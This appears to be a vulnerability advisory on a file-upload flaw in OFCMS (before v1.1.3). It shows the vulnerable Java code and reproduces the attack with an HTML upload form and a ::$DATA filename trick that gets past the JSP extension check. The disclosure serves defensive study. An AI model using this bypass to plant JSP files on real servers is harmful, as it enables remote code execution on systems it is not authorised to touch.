### OFCMS background editUploadImage file upload vulnerability
#### Vulnerability Introduction
OFCMS is a content management system based on Java technology. Functions: column template customization, content model customization, multiple site management, online template page editing and other functions. The code is completely open source, MIT license agreement.
#### Vulnerability impact
- < v1.1.3
#### Vulnerability analysis
The vulnerability trigger point is the editUploadImage method in the `com/ofsoft/cms/admin/controller/ComnController.java` file.
```java
@Clear
public void editUploadImage() {
try {
UploadFile file = this.getFile("file", "image");
file.getFile().createNewFile();
Map<String, Object> msg = new HashMap<String, Object>();
Map<String, Object> data = new HashMap<String, Object>();
data.put("src", SystemUtile.getParam("http_image_url")
+ "/upload/image/" + file.getFileName());
data.put("title", file.getFileName());
msg.put("data", data);
msg.put("code", 0);
msg.put("msg", "处理成功");
rendJson(msg);
} catch (Exception e) {
rendFailedJson(ErrorCode.get("9999"));
}
}
```
The upload file is processed by the getFile function. During the period, the uploaded file contents and file types are not checked and filtered. At the end, the file name is detected.
```java
private boolean isSafeFile(UploadFile uploadFile) {
String fileName = uploadFile.getFileName().trim().toLowerCase();
if (!fileName.endsWith(".jsp") && !fileName.endsWith(".jspx")) {
return true;
} else {
uploadFile.getFile().delete();
return false;
}
}
```
It can be seen that the uploaded file name is not allowed to end with jsp and jspx, but here can be bypassed, bypassing this judgment can successfully upload jsp file.
#### Recurring environment
- Windows
- Tomcat 8.0.43
#### Vulnerability recurrence
1. Login to the background
2. Construct a form upload file
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>upload file</title>
</head>
<body>
<form action="http://192.168.245.1:8080/admin/comn/service/editUploadImage" method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="text" name="p" value="comn/upload.html">
<input type="submit" name="submit" value="上传文件">
</form>
</body>
</html>
```
3. Upload the file, use Burpsuite to intercept, and modify the file name. On the Windows platform:: $DATA for truncation, under Linux platform can be used > truncation (not tested).
![](https://images.seebug.org/1551860873014-w331s)
Can see the return is successful
![](https://images.seebug.org/1551860889021-w331s)
Under the /upload/image/ directory
![](https://images.seebug.org/1551860901607-w331s)
暂无评论